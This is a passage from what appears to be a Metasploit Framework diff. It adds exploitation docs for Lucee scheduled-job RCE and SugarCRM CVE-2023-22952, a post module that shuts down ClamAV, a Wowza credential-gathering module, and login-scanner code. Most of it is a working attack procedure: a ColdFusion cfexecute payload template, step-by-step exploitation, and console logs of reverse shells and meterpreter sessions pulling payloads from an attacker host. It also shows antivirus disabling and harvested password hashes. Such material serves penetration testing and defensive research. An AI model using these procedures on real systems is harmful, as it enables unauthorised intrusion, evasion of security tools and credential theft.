+query a remote ColdFusion document, log it in the web root, and access it to execute its code,
+subsequently achieving arbitrary server side code execution. The payload will run as the user 
+specified during the Lucee installation. On Windows, this is a service account; on Linux, 
+it is either the root user or lucee.
+
+The series of requests to achieve this is as follows.
+
+1. Authenticate as the administrator to the web admin panel
+2. Create a scheduled job that includes a URL to the remote ColdFusion document
+3. Update the scheduled job to turn on logging and ensure that the remote document is logged to the web root
+4. Execute the scheduled job. The Lucee server will now reach out to and download the ColdFusion document from the attackers server
+5. Access the document at the web root of the server, thus executing the payload.
+
+The basic format for the remote ColdFusion document is as follows.
+```html
+<cfscript>
+            cfexecute(name="powershell.exe", arguments="-c whoami",timeout=5);
+</cfscript>
+```
+
+The scheduled job feature of Lucee is available in all versions currently available through the vendors website,
+available [here](https://download.lucee.org/).As this is default functionality that does not require
+any additional setup/configuration, the application is vulnerable immediately upon setup.
+
+## Verification Steps
+
+1. Download and install Lucee from the vendors website. This can be done on either a Windows or Unix host.
+   No additional setup is needed beyond the initial installation walkthrough
+2. Start MSF Console
+3. Do: `use multi/http/lucee_scheduled_job`
+4. Choose a target that reflects the target system
+	- `use X` (0 for Windows, 1 for Linux)
+5. Select payload. This functions with command execution payloads and supports reverse shells and generic commands.
+6. Select the desired payload and complete its requirement. `CMD`, `LHOST`, `LPORT`, etc.
+7. Select the appropriate `RHOST`, `PASSWORD`, and (if necessary), the `TARGETURI`
+8. Execute the payload. You should either receive a shell or see the output of your command.
+
+## Options
+
+### RHOSTS
+
+Remote host to target.
+
+### RPORT
+
+Port being used by the Lucee admin panel. Default is 8888
+
+### PASSWORD
+
+The password of the administrative user. Lucee does not use a username, only a password to access the admin panel.
+
+### TARGETURI
+
+Target URI of the Lucee administrator panel. Default is
+
+`/lucee/admin/web.cfm/`
+
+
+### PAYLOAD_DEPLOY_TIMEOUT
+
+Periodically, the target web server may take a moment to download and make the payload accessible. This
+parameter determines how long the exploit should wait until considering the payload inaccessible.
+
+
+## Scenarios
+### Successful exploitation of a Windows 10 host running Lucee 5.3.10.120 for a service account shell
+```
+msf6 > use exploit/multi/http/lucee_scheduled_job 
+[*] Using configured payload cmd/windows/generic
+msf6 exploit(multi/http/lucee_scheduled_job) > set payload cmd/windows/powershell_reverse_tcp
+payload => cmd/windows/powershell_reverse_tcp
+msf6 exploit(multi/http/lucee_scheduled_job) > set RHOSTS 10.0.0.164
+RHOSTS => 10.0.0.164
+msf6 exploit(multi/http/lucee_scheduled_job) > set LHOST 10.0.0.45
+LHOST => 10.0.0.45
+msf6 exploit(multi/http/lucee_scheduled_job) > set PASSWORD admin123
+PASSWORD => admin123
+msf6 exploit(multi/http/lucee_scheduled_job) > run
+
+[*] Started reverse TCP handler on 192.168.19.145:4444 
+[+] Authenticated successfully
+[*] Using URL: http://192.168.19.145:8081/W7hSRT7xJLjosBr.cfm
+[+] Job W7hSRT7xJLjosBr created successfully
+[+] Job W7hSRT7xJLjosBr updated successfully
+[*] Executing scheduled job: W7hSRT7xJLjosBr
+[+] Job W7hSRT7xJLjosBr executed successfully
+[*] Attempting to access payload...
+[*] Payload request received for /W7hSRT7xJLjosBr.cfm?RequestTimeout=50 from 192.168.19.131
+[*] Attempting to access payload...
+[*] Powershell session session 1 opened (192.168.19.145:4444 -> 192.168.19.131:53204) at 2023-02-28 19:52:46 -0600
+[*] Received 500 response from W7hSRT7xJLjosBr.cfm
+[+] Exploit completed.
+[*] Removing scheduled job W7hSRT7xJLjosBr
+[+] Scheduled job removed.
+[*] Server stopped.
+[!] This exploit may require manual cleanup of 'C:\lucee\tomcat\webapps\ROOT\W7hSRT7xJLjosBr.cfm' on the target
+
+
+Shell Banner:
+Windows PowerShell running as user LOCAL SERVICE on HOMELAB-BINCE
+Copyright (C) Microsoft Corporation. All rights reserved.
+-----
+          
+PS C:\lucee\tomcat> 
+```
+### Successful exploitation of a Windows 10 host running Lucee 5.3.10.120 executing whoami
+```
+msf6 > use exploit/multi/http/lucee_scheduled_job 
+[*] Using configured payload cmd/windows/generic
+msf6 exploit(multi/http/lucee_scheduled_job) > set PASSWORD admin123
+PASSWORD => admin123
+msf6 exploit(multi/http/lucee_scheduled_job) > set CMD whoami
+CMD => whoami
+msf6 exploit(multi/http/lucee_scheduled_job) > set RHOSTS 10.0.0.164
+RHOSTS => 10.0.0.164
+msf6 exploit(multi/http/lucee_scheduled_job) > run
+
+[+] Authenticated successfully
+[*] Using URL: http://192.168.19.145:8081/UHn0jvUP2ZDtgwN.cfm
+[+] Job UHn0jvUP2ZDtgwN created successfully
+[+] Job UHn0jvUP2ZDtgwN updated successfully
+[*] Executing scheduled job: UHn0jvUP2ZDtgwN
+[+] Job UHn0jvUP2ZDtgwN executed successfully
+[*] Attempting to access payload...
+[*] Payload request received for /UHn0jvUP2ZDtgwN.cfm?RequestTimeout=50 from 192.168.19.131
+[*] Attempting to access payload...
+[+] Received 200 response from UHn0jvUP2ZDtgwN.cfm
+[+] Output: nt authority\local service
+[+] Exploit completed.
+[*] Removing scheduled job UHn0jvUP2ZDtgwN
+[+] Scheduled job removed.
+[*] Server stopped.
+[!] This exploit may require manual cleanup of 'C:\lucee\tomcat\webapps\ROOT\UHn0jvUP2ZDtgwN.cfm' on the target
+[*] Exploit completed, but no session was created.
+```
+
+### Successful exploitation of a Docker host running Lucee 5.1.4.19 for a shell as Lucee
+```
+msf6 > use exploit/multi/http/lucee_scheduled_job 
+[*] Using configured payload cmd/windows/generic
+msf6 exploit(multi/http/lucee_scheduled_job) > set PASSWORD admin123
+PASSWORD => admin123
+msf6 exploit(multi/http/lucee_scheduled_job) > set target 1
+target => 1
+msf6 exploit(multi/http/lucee_scheduled_job) > set payload cmd/unix/reverse_bash
+payload => cmd/unix/reverse_bash
+msf6 exploit(multi/http/lucee_scheduled_job) > set LHOSTS 10.0.0.45
+LHOST => 10.0.0.45
+msf6 exploit(multi/http/lucee_scheduled_job) > set RHOSTS 10.0.0.33
+RHOSTS => 10.0.0.33
+msf6 exploit(multi/http/lucee_scheduled_job) > set PASSWORD admin123
+PASSWORD => admin123
+msf6 exploit(multi/http/lucee_scheduled_job) > run
+
+[*] Started reverse TCP handler on 192.168.19.145:4444 
+[+] Authenticated successfully
+[*] Using URL: http://192.168.19.145:8081/CUyWHyD6Y.cfm
+[+] Job CUyWHyD6Y created successfully
+[+] Job CUyWHyD6Y updated successfully
+[*] Executing scheduled job: CUyWHyD6Y
+[+] Job CUyWHyD6Y executed successfully
+[*] Attempting to access payload...
+[*] Payload request received for /CUyWHyD6Y.cfm?RequestTimeout=50 from 192.168.19.145
+[*] Attempting to access payload...
+[*] Received 500 response from CUyWHyD6Y.cfm Check your listener!
+[+] Exploit completed.
+[*] Removing scheduled job CUyWHyD6Y
+[+] Scheduled job removed.
+[+] Deleted /srv/www/app/webroot/CUyWHyD6Y.cfm
+[*] Command shell session 1 opened (192.168.19.145:4444 -> 192.168.19.145:58686) at 2023-02-28 19:56:11 -0600
+[*] Server stopped.
+
+whoami
+root
+```
+### Successful exploitation of a Docker host running Lucee 5.1.4.19 executing whoami
+```
+msf6 > use exploit/multi/http/lucee_scheduled_job 
+[*] Using configured payload cmd/windows/generic
+msf6 exploit(multi/http/lucee_scheduled_job) > set PASSWORD admin123
+PASSWORD => admin123
+msf6 exploit(multi/http/lucee_scheduled_job) > set target 1
+target => 1
+msf6 exploit(multi/http/lucee_scheduled_job) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 exploit(multi/http/lucee_scheduled_job) > set payload cmd/unix/generic
+payload => cmd/unix/generic
+msf6 exploit(multi/http/lucee_scheduled_job) > set CMD whoami
+CMD => whoami
+msf6 exploit(multi/http/lucee_scheduled_job) > set PASSWORD admin123
+PASSWORD => admin123
+msf6 exploit(multi/http/lucee_scheduled_job) > run
+
+[+] Authenticated successfully
+[*] Using URL: http://192.168.19.145:8081/GCHSFzGe.cfm
+[+] Job GCHSFzGe created successfully
+[+] Job GCHSFzGe updated successfully
+[*] Executing scheduled job: GCHSFzGe
+[+] Job GCHSFzGe executed successfully
+[*] Attempting to access payload...
+[*] Payload request received for /GCHSFzGe.cfm?RequestTimeout=50 from 192.168.19.145
+[+] Received 200 response from GCHSFzGe.cfm
+[+] Output: root
+[+] Exploit completed.
+[*] Removing scheduled job GCHSFzGe
+[+] Scheduled job removed.
+[*] Server stopped.
+[!] This exploit may require manual cleanup of '/srv/www/app/webroot/GCHSFzGe.cfm' on the target
+[*] Exploit completed, but no session was created.
+```
+## Caveats
+There are a few caveats worth mentioning that are inherent to Lucee's implementation of ColdFusion
+ - When a shell command returns multiple lines of output, coldfusion may limit the amount that is returned; i.e. it
+   will return the full value of an `ls` command, but it may not return the full value of `netstat`
@@ -0,0 +1,195 @@
+## Vulnerable Application
+
+This module exploits CVE-2023-22952, a Remote Code Execution (RCE) vulnerability in SugarCRM 11.0 Enterprise,
+Professional, Sell, Serve, and Ultimate versions prior to `11.0.5` and SugarCRM 12.0 Enterprise, Sell, and
+Serve versions prior to `12.0.2`.
+
+The vulnerability occurs due to a lack of appropriate validation when uploading a malicious `PNG` file with
+embedded PHP code to the `/cache/images/` directory on the web server using the vulnerable endpoint
+`/index.php?module=EmailTemplates&action=AttachFiles`. Once uploaded to the server, depending on server configuration,
+the attacker can access the malicious PNG file via HTTP or HTTPS, thereby executing the malicious PHP code and
+gaining access to the system.
+
+This vulnerability does not require authentication because there is a missing authentication check in the
+`loadUser()` method in `include/MVC/SugarApplication.php`. After a failed login, the session does not get
+destroyed and hence the attacker can continue to send valid requests to the application. See this
+[AttackerKB Article](https://attackerkb.com/topics/E486ui94II/cve-2023-22952) for more details.
+
+Because of this, any remote attacker, regardless of authentication, can exploit this vulnerability to gain
+access to the underlying operating system as the user that the web services are running as (typically `www-data`).
+
+Installing a vulnerable test bed requires a Linux machine with the vulnerable SugarCRM software loaded.
+Follow instructions [here](https://support.sugarcrm.com/Documentation/Sugar_Versions/11.0/Ent/Installation_and_Upgrade_Guide/),
+but you need to be registered as a sugarcrm customer in order to access the software.
+This module has been tested against a SugarCRM installation with the specifications listed below:
+
+* SugarCRM Enterprise Edition
+* Version: `11.0.4`
+* Build: `300`
+* Linux OS: Debian 8.6
+
+## Verification Steps
+
+1. `use exploit/multi/http/sugarcrm_webshell_cve_2023_22952`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `set LHOST <attacker host ip>`
+1. `set LPORT <attacker host port>`
+1. `set TARGET <0-PHP, 1-Unix command or 2-Linux Dropper>`
+1. `exploit`
+1. You should get a `bash` shell or `meterpreter` session depending on the target and payload settings.
+
+## Options
+
+### WEBSHELL
+You can use this option to set the filename and extension of the webshell.
+This is handy if you want to test the webshell upload and execution with different file extensions (.phtml, .php7, .inc)
+to bypass any security settings on the Web and PHP server.
+
+### COMMAND
+This option provides the user to choose the PHP underlying shell command function to be used for execution.
+The choices are `system()`, `passthru()`, `shell_exec()` and `exec()` and it defaults to `passthru()`.
+This option is only available when the target selected is either Unix Command or Linux Dropper.
+For the native PHP target, by default the `eval()` function will be used for native PHP code execution.
+
+## Scenarios
+
+### SugarCRM 11.0.4 Enterprise Build 300 on Debian 8.6 - PHP Meterpreter session
+```
+msf6 > use exploit/multi/http/sugarcrm_webshell_cve_2023_22952
+[*] Using configured payload php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > options
+
+Module options (exploit/multi/http/sugarcrm_webshell_cve_2023_22952):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      80               yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       SugarCRM base url
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+   WEBSHELL                    no        The name of the webshell with extension to trick the parser like .phtml, .phar, etc. Webshell
+                                         name will be randomly generated if left unset.
+
+
+   When TARGET is not 0:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   COMMAND  passthru         yes       Use PHP command function (Accepted: passthru, shell_exec, system, exec)
+
+
+   When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or
+                                        0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   PHP
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set rhosts 192.168.100.180
+rhosts => 192.168.100.180
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set lhost 192.168.100.254
+lhost => 192.168.100.254
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set lport 4444
+lport => 4444
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set target 0
+target => 0
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.254:4444
+[*] Executing PHP for php/meterpreter/reverse_tcp
+[*] Sending stage (39927 bytes) to 192.168.100.180
+[+] Deleted cXSbMSaTtcnn.phtml
+[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:52584) at 2023-02-15 14:11:23 +0000
+
+meterpreter > sysinfo
+Computer     : sugarcrm
+OS           : Debian 8.6 (Linux 2.6.32)
+Meterpreter  : php/linux
+meterpreter > getuid
+Server username: www-data
+meterpreter > exit
+```
+
+### SugarCRM 11.0.4 Enterprise Build 300 on Debian 8.6 - bash reverse shell
+```
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set rhosts 192.168.100.180
+rhosts => 192.168.100.180
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set lhost 192.168.100.254
+lhost => 192.168.100.254
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set lport 4444
+lport => 4444
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set target 1
+target => 1
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.254:4444
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[+] Deleted RPXrYGLCvGjL.phar
+[*] Command shell session 2 opened (127.0.0.1:4444 -> 127.0.0.1:52584) at 2023-01-19 19:14:56 +0000
+
+whoami
+www-data
+exit
+```
+
+### SugarCRM 11.0.4 Enterprise Build 300 on Debian 8.6 - Linux Meterpreter session
+```
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set rhosts 192.168.100.180
+rhosts => 192.168.100.180
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set lhost 192.168.100.254
+lhost => 192.168.100.254
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set lport 4444
+lport => 4444
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set target 2
+target => 2
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.254:4444
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Using URL: http://192.168.100.254:8080/aLYDt2
+[*] Client 127.0.0.1 (Wget/1.16 (linux-gnu)) requested /aLYDt2
+[*] Sending payload to 127.0.0.1 (Wget/1.16 (linux-gnu))
+[*] Sending stage (3045348 bytes) to 127.0.0.1
+[+] Deleted ZxGTSVGsOUZs.phtml
+[*] Meterpreter session 3 opened (127.0.0.1:4444 -> 127.0.0.1:43076) at 2023-01-19 19:16:07 +0000
+[*] Command Stager progress - 100.00% done (121/121 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : sugarcrm
+OS           : Debian 8.6 (Linux 2.6.32)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: www-data
+meterpreter > exit
+```
+
+## Limitations
+No `check` method.
@@ -0,0 +1,55 @@
+### Description
+This module will cause the ClamAV service to be shutoff on Linux hosts. 
+ClamAV uses a Unix socket that allows non-privileged users to interact with the ClamAV daemon via utilities like "clamscan".
+However, no additional checks are required to trigger ClamAV's shutdown.
+
+## Verification Steps
+### Shuting off ClamAV
+  1. Launch `msfconsole`
+  2. Get a Meterpreter shell on a Linux host that's also running ClamAV.
+  3. Do: `use post/linux/manage/disable_clamav`
+  4. Do: `set SESSION <session number on the Linux host>`
+  6. Do: `exploit -j`
+  7. The daemon should be shutoff.
+
+## Scenarios
+```
+msf6 post(linux/manage/disable_clamav) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                   Information               Connection
+  --  ----  ----                   -----------               ----------
+  4         meterpreter x86/linux  dllcoolj @ 192.168.130.1  127.0.0.1:4444 -> 127.0.0.1:38360 (127.0.0.1)
+
+msf6 post(linux/manage/disable_clamav) > show options
+
+Module options (post/linux/manage/disable_clamav):
+
+   Name                Current Setting        Required  Description
+   ----                ---------------        --------  -----------
+   CLAMAV_UNIX_SOCKET  /run/clamav/clamd.ctl  yes       ClamAV unix socket
+   SESSION             4                      yes       The session to run this module on
+
+
+View the full module info with the info, or info -d command.
+
+msf6 post(linux/manage/disable_clamav) > ps -ef | grep 'clamd'
+[*] exec: ps -ef | grep 'clamd'
+
+clamav    132021       1 16 18:51 ?        00:00:09 clamd
+dllcoolj  132533   71177  0 18:52 pts/3    00:00:00 sh -c ps -ef | grep 'clamd'
+dllcoolj  132535  132533  0 18:52 pts/3    00:00:00 grep clamd
+msf6 post(linux/manage/disable_clamav) > exploit -j
+[*] Post module running as background job 10.
+msf6 post(linux/manage/disable_clamav) >
+[*] Checking file path /run/clamav/clamd.ctl exists and is writable...
+[+] File does exist and is writable!
+[*] Shutting down ClamAV!
+
+msf6 post(linux/manage/disable_clamav) > ps -ef | grep 'clamd'
+[*] exec: ps -ef | grep 'clamd'
+
+dllcoolj  132927  132925  0 18:52 pts/3    00:00:00 grep clamd
+```
@@ -0,0 +1,44 @@
+## Vulnerable Application
+
+This module collects Wowza Streaming Engine user credentials.
+
+
+## Installation Steps
+
+Download and install [Wowza Streaming Engine](https://portal.wowza.com/account/downloads).
+
+
+## Verification Steps
+
+1. Start msfconsole
+1. Get a session
+1. Do: `use post/multi/gather/wowza_streaming_engine_creds`
+1. Do: `set SESSION <session id>`
+1. Do: `run`
+
+
+## Options
+
+
+## Scenarios
+
+### Wowza Streaming Engine Manager Version 4.8.20+1 (build 20220919162035) on Ubuntu 22.04
+
+```
+msf6 > use post/multi/gather/wowza_streaming_engine_creds 
+msf6 post(multi/gather/wowza_streaming_engine_creds) > set session 1
+session => 1
+msf6 post(multi/gather/wowza_streaming_engine_creds) > run
+
+[*] Parsing file /usr/local/WowzaStreamingEngine/conf/admin.password
+Wowza Streaming Engine Credentials
+==================================
+
+Username  Password                                                      Groups         Encoding
+--------  --------                                                      ------         --------
+guest     $2y$10$HbioW4tMn6aqtMjrXWxbp.sCCGkRL2bM2prNJG0elnLlcLnsV5XDK  basic          bcrypt
+user      $2y$10$PiMwykGY8H9ZX45AwjgAluCXHwvswpCFrIsHmCKqLtSJLITXagjwu  admin|advUser  bcrypt
+
+[+] Credentials stored in: /root/.msf4/loot/20230306035212_default_192.168.200.158_host.wowzastream_500725.txt
+[*] Post module execution completed
+```
@@ -76,7 +76,7 @@ module ResponseDataHelper
    begin
      # If we are running the data service on the same box this will ensure we only write
      # the file if it is somehow not there already.
-      unless File.exists?(save_path) && File.read(save_path, mode: 'rb') == decoded_file
+      unless File.exist?(save_path) && File.read(save_path, mode: 'rb') == decoded_file
        File.write(save_path, decoded_file, mode: 'wb')
      end
    rescue => e
@@ -0,0 +1,141 @@
+require 'metasploit/framework/login_scanner/http'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+      class SoftingSIS < HTTP
+
+        DEFAULT_PORT = 8099
+        DEFAULT_SSL_PORT = 443
+        PRIVATE_TYPES = [ :password ]
+        LOGIN_STATUS = Metasploit::Model::Login::Status
+
+        # Check if the target is Softing Secure Integration Server
+        #
+        # @return [Boolean] TrueClass if target is SIS, otherwise FalseClass
+        def check_setup
+          # we can interact with this endpoint as an unauthenticated user
+          uri = normalize_uri("#{uri}/runtime/core/product-version")
+          res = send_request({ 'uri' => uri })
+          # make sure we get a response, and that the check was successful
+          unless res && res.code == 200
+            return { status: LOGIN_STATUS::UNABLE_TO_CONNECT, proof: res.to_s }
+          end
+
+          # convert the response to JSON
+          # we expect to see a response like {"version" : "1.22.0.8686"}
+          res_json = res.get_json_document
+          # if we successfully get the version
+          if res_json['version']
+            # return true
+            return res_json['version']
+          end
+
+          false
+        end
+
+        # the actual login method, called by #attempt_login
+        #
+        # @param user [String] The username to try
+        # @param pass [String] The password to try
+        # @return [Hash]
+        #   * status [Metasploit::Model::Login::Status]
+        #   * proof [String] the HTTP response body
+        def do_login(user, pass)
+          # prep the data needed for login
+          protocol = ssl ? 'https' : 'http'
+          # attempt to get an authentication token
+          auth_token_uri = normalize_uri("#{uri}/runtime/core/user/#{user}/authentication-token")
+
+          # send the request to get an authentication token
+          auth_res = send_request({
+            'method' => 'GET',
+            'uri' => auth_token_uri,
+            'cookie' => 'lang=en; user=guest'
+          })
+
+          # check if we get a response
+          unless auth_res
+            return { status: LOGIN_STATUS::UNABLE_TO_CONNECT, proof: auth_res.to_s }
+          end
+
+          # convert the response to JSON
+          auth_json = auth_res.get_json_document
+          # if the response code is 404, the user does not exist
+          if auth_res.code == 404 && auth_json && auth_json['Message']
+            return { status: LOGIN_STATUS::INCORRECT, proof: auth_json['Message'] }
+          end
+
+          # if the response code is 403, the user exists but access is denied
+          if auth_res.code == 403 && auth_json && auth_json['Message']
+            return { status: LOGIN_STATUS::DENIED_ACCESS, proof: auth_json['Message'] }
+          end
+
+          # get authentication token
+          auth_token = auth_json['authentication-token']
+          # check that the token is not blank
+          if auth_token.blank?
+            framework_module.vprint_error('Received empty authentication token!')
+            return { status: LOGIN_STATUS::INCORRECT, proof: auth_res.body.to_s }
+          end
+
+          login_uri = normalize_uri("#{uri}/runtime/core/user/#{user}/authentication")
+          # calculate signature to use when logging in
+          signature = Digest::MD5.hexdigest(auth_token + pass + auth_token + user + auth_token)
+          # GET parameters for login
+          vars_get = {
+            'Signature' => signature,
+            'User' => user
+          }
+
+          # do the login
+          res = send_request({
+            'method' => 'GET',
+            'uri' => login_uri,
+            'cookie' => 'lang=en; user=guest',
+            'headers' => { 'Referer' => "#{protocol}://#{host}:#{port}" },
+            'vars_get' => vars_get
+          })
+
+          unless res
+            return { status: LOGIN_STATUS::UNABLE_TO_CONNECT, proof: res.to_s }
+          end
+
+          # the response is in JSON format
+          res_json = res.get_json_document
+          # a successful response will contain {"Message": "Success"}
+          if res.code == 200 && res_json && res_json['Message'] == 'Success'
+            return { status: LOGIN_STATUS::SUCCESSFUL, proof: res.body }
+          end
+
+          { status: LOGIN_STATUS::INCORRECT, proof: res.body }
+        end
+
+        # Attempts to login to Softing Secure Integration Server
+        #
+        # @param credential [Metasploit::Framework::Credential] The credential object
+        # @return [Result] A Result object indicating success or failure
+        def attempt_login(credential)
+          result_opts = {
+            credential: credential,
+            status: Metasploit::Model::Login::Status::INCORRECT,
+            proof: nil,
+            host: host,
+            port: port,
+            protocol: 'tcp'
+          }
+
+          begin
+            result_opts.merge!(do_login(credential.public, credential.private))
+          rescue ::Rex::ConnectionError => e
+            # something went wrong during login
+            result_opts.merge!(status: LOGIN_STATUS::UNABLE_TO_CONNECT, proof: e.message)
+          end
+
+          Result.new(result_opts)
+        end
+
+      end
+    end
+  end
+end
@@ -0,0 +1,65 @@
+require 'metasploit/framework/login_scanner/http'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+      class WowzaStreamingEngineManager < HTTP
+
+        DEFAULT_PORT = 8088
+        PRIVATE_TYPES = [ :password ].freeze
+        LOGIN_STATUS = Metasploit::Model::Login::Status
+
+        # Checks if the target is Wowza Streaming Engine Manager. The login module should call this.
+        #
+        # @return [Boolean] TrueClass if target is Wowza Streaming Engine Manager, otherwise FalseClass
+        def check_setup
+          res = send_request({ 'uri' => normalize_uri('/enginemanager/login.htm') })
+
+          return false unless res
+          return false unless res.code == 200
+
+          res.body.include?('Wowza Streaming Engine Manager')
+        end
+
+        #
+        # Attempts to login to Wowza Streaming Engine server via Manager web interface
+        #
+        # @param credential [Metasploit::Framework::Credential] The credential object
+        # @return [Result] A Result object indicating success or failure
+        #
+        def attempt_login(credential)
+          result_opts = {
+            credential: credential,
+            status: Metasploit::Model::Login::Status::INCORRECT,
+            proof: nil,
+            host: host,
+            port: port,
+            protocol: 'tcp'
+          }
+
+          res = send_request({
+            'method' => 'POST',
+            'uri' => normalize_uri('/enginemanager/j_spring_security_check'),
+            'vars_post' => {
+              'wowza-page-redirect' => '',
+              'j_username' => credential.public.to_s,
+              'j_password' => credential.private.to_s,
+              'host' => 'http://localhost:8087'
+            }
+          })
+
+          unless res
+            result_opts.merge!({ status: LOGIN_STATUS::UNABLE_TO_CONNECT })
+          end
+
+          if res && res.code == 302 && res['location'].to_s.include?('Home.htm')
+            cookie = res.get_cookies
+            result_opts.merge!({ status: LOGIN_STATUS::SUCCESSFUL, proof: cookie.to_s }) unless cookie.blank?
+          end
+
+          Result.new(result_opts)
+        end
+      end
+    end
+  end
+end
@@ -1,5 +1,6 @@
 require 'rbconfig'
 require 'yaml'
+require 'open3'

 module Metasploit
  module Framework
@@ -17,20 +18,21 @@ module Metasploit
            version_info = YAML.load_file(version_yml)
            hash = '-' + version_info['build_framework_rev']
          else
-            # determine if git is installed
-            null = RbConfig::CONFIG['host_os'] =~ /mswin|mingw/ ? 'NUL' : '/dev/null'
-            git_installed = system("git --version > #{null} 2>&1")
-
-            # get the hash of the HEAD commit
-            if git_installed && File.exist?(File.join(root, '.git'))
-              hash = '-' + `git rev-parse --short HEAD`
+            # Fallback to using Git version detection if version_yml not present
+            changed_files = %w[git rev-parse --short HEAD]
+            begin
+              # stderr may contain Git warnings that we can ignore
+              output, _stderr, status = ::Open3.capture3(*changed_files, chdir: root)
+              hash = "-#{output}" if status.success?
+            rescue => e
+              elog(e) if defined?(elog)
            end
          end
          hash.strip
        end
      end

-      VERSION = "6.3.2"
+      VERSION = "6.3.7"
      MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
      PRERELEASE = 'dev'
      HASH = get_hash
@@ -317,9 +317,7 @@ class ReadableText
    end

    # Description
-    output << "Description:\n"
-    output << word_wrap(Rex::Text.compress(mod.description))
-    output << "\n"
+    output << dump_description(mod, indent)

    # References
    output << dump_references(mod, indent)
@@ -373,9 +371,7 @@ class ReadableText
    end

    # Description
-    output << "Description:\n"
-    output << word_wrap(Rex::Text.compress(mod.description))
-    output << "\n"
+    output << dump_description(mod, indent)

    # References
    output << dump_references(mod, indent)
@@ -433,9 +429,7 @@ class ReadableText
    end

    # Description
-    output << "Description:\n"
-    output << word_wrap(Rex::Text.compress(mod.description))
-    output << "\n"
+    output << dump_description(mod, indent)

    # References
    output << dump_references(mod, indent)
@@ -482,9 +476,7 @@ class ReadableText
    end

    # Description
-    output << "Description:\n"
-    output << word_wrap(Rex::Text.compress(mod.description))
-    output << "\n"
+    output << dump_description(mod, indent)

    # References
    output << dump_references(mod, indent)
@@ -524,9 +516,8 @@ class ReadableText
    end

    # Description
-    output << "Description:\n"
-    output << word_wrap(Rex::Text.compress(mod.description))
-    output << "\n\n"
+    output << dump_description(mod, indent)
+    output << "\n"

    return output
  end
@@ -556,9 +547,7 @@ class ReadableText
    output << dump_traits(mod)

    # Description
-    output << "Description:\n"
-    output << word_wrap(Rex::Text.compress(mod.description))
-    output << "\n"
+    output << dump_description(mod, indent)

    output << dump_references(mod, indent)

@@ -1141,17 +1130,44 @@ class ReadableText
    return framework.jobs.keys.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No active jobs.\n"
  end

-  # Jacked from Ernest Ellingson <erne [at] powernav.com>, modified
-  # a bit to add indention
+  # Dumps the module description
  #
-  # @param str [String] the string to wrap.
-  # @param indent [Integer] the indentation amount.
-  # @param col [Integer] the column wrap width.
-  # @return [String] the wrapped string.
-  def self.word_wrap(str, indent = DefaultIndent, col = DefaultColumnWrap)
-    return Rex::Text.wordwrap(str, indent, col)
+  # @param mod [Msf::Module] the module.
+  # @param indent [String] the indentation string
+  # @return [String] the string description
+  def self.dump_description(mod, indent)
+    description = mod.description
+
+    output = "Description:\n"
+    output << word_wrap_description(description, indent)
+    output << "\n\n"
  end

+  # @param str [String] the string to wrap.
+  # @param indent [String] the indentation string
+  # @return [String] the wrapped string.
+  def self.word_wrap_description(str, indent = '')
+    return '' if str.blank?
+
+    str_lines = str.strip.lines(chomp: true)
+    # Calculate the preceding whitespace length of each line
+    smallest_preceding_whitespace = nil
+    str_lines[1..].to_a.each do |line|
+      preceding_whitespace = line[/^\s+/]
+      if preceding_whitespace && (smallest_preceding_whitespace.nil? || preceding_whitespace.length < smallest_preceding_whitespace)
+        smallest_preceding_whitespace = preceding_whitespace.length
+      end
+    end
+
